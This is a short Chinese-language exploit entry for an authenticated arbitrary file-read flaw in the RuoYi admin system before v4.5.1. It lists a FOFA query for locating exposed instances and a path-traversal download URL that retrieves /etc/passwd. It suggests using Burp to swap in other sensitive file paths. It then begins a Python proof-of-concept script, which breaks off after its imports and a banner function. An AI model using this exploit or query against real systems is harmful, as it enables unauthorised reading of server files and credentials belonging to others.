若依(RuoYi)管理系统 后台任意文件读取
漏洞描述
若依管理系统是基于SpringBoot的权限管理系统,登录后台后可以读取服务器上的任意文件
漏洞影响
RuoYi < v4.5.1
FOFA
app=“若依-管理系统”
漏洞复现
登录后台后访问 Url
https://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/…/…/…/…/etc/passwd
访问后会下载文件 /etc/passwd
可以使用Burp抓包改变 /etc/passwd 为其他文件路径获取敏感信息
在新版本的修复中添加了过滤
漏洞利用POC
POC使用需要后台的Cookie,读取的文件路径应为根路径
import requests
import sys
import random
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
print('+------------------------------------------')</